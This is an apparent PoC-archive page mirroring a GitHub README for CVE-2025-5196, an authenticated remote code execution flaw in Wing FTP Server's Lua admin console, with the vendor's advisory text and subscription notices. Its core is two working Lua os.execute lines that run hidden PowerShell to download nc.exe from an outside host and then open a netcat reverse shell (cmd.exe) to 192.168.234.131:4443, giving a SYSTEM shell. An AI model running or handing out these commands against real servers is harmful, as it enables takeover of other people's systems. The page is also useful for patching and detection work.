Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-5196 PoC — Wing FTP Server Lua Admin Console unnecessary privileges

Source
https://github.com/Nouvexr/Wing-FTP-Server-7.4.4-RCE-Authenticated
Associated Vulnerability
Title:Wing FTP Server Lua Admin Console unnecessary privileges (CVE-2025-5196)
Description:A vulnerability has been found in Wing FTP Server up to 7.4.3 and classified as critical. Affected by this vulnerability is an unknown functionality of the component Lua Admin Console. The manipulation leads to execution with unnecessary privileges. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. Upgrading to version 7.4.4 is able to address this issue. It is recommended to upgrade the affected component. The vendor explains: "[W]e do not consider it as a security vulnerability, because the system admin in WingFTP has full permissions [...], but you can suggest the user run WingFTP service as Normal User rather than SYSTEM/Root, it will be safer."
Description
Wing FTP Server provides an administrative Lua scripting console accessible via its web interface. Authenticated administrators are able to execute arbitrary Lua code with insufficient sandboxing. CVE-2025-5196
Readme
# Wing FTP Server 7.4.4 - Remote Code Execution (Authenticated) (CVE-2025-5196)
Wing FTP Server provides an administrative Lua scripting console accessible via its web interface. Authenticated administrators are able to execute arbitrary Lua code with insufficient sandboxing.

Affected Version: Wing FTP Server 7.4.4 (Windows) | Authentication Required: Yes

---

# Download & Release Notes
Until May 24, 2025, the latest version of the application provided by the vendor can be found at the following link: https://www.wftpserver.com/download.htm

Additionally, it can be noted that until the same date, there is a release note published informing that the RCE vulnerability has been fixed in version 7.4.4. The link to the release notes can be found here: https://www.wftpserver.com/serverhistory.htm
![image](https://github.com/user-attachments/assets/6c012118-50d8-4698-9378-8eef746c4708)

---

# PoC
PoC related to CVE-2025-5196 [VulDB](https://vuldb.com/?id.310279)
![image](https://github.com/user-attachments/assets/f35ef4d9-fd4a-4a5f-ab50-d1b9bf5bb3b3)

Wing FTP Server Web Interface

![image](https://github.com/user-attachments/assets/36426432-9ba6-4f00-8599-2dd9dffc876b)

![image](https://github.com/user-attachments/assets/9b316062-448d-45f5-8988-c98bbf950ce0)

The first peace of the command will download the nc.exe (netcat for Windows x86) to the path "C:\Users\usuario\Desktop\Drops". The second part will execute nc.exe 192.168.234.131 4443 -e cme.exe.
```
os.execute('powershell -NoP -NonI -W Hidden -Exec Bypass -Command "(New-Object Net.WebClient).DownloadFile(\'http://192.168.234.131:8000/nc.exe\', \'C:\\\\Users\\\\usuario\\\\Desktop\\\\Drops\\\\nc.exe\')"')
```
```
os.execute('cmd /c powershell -NoP -W Hidden -Command "Start-Process \\"C:\\Users\\usuario\\Desktop\\Drops\\nc.exe\\" -ArgumentList \\"192.168.234.131\\",\\"4443\\",\\"-e\\",\\"cmd.exe\\""')
```
![image](https://github.com/user-attachments/assets/c6aaac7b-bdca-4d1a-baaf-cc4a14c56cc7)

NT/SYSTEM Shell
![image](https://github.com/user-attachments/assets/a8efd159-0153-4304-9438-7ae3b27ce258)
File Snapshot

 [4.0K]  /data/pocs/ab4ebd7a6c2611d4253f927156e85285571d007c
├── [ 475]  poc.txt
└── [2.0K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →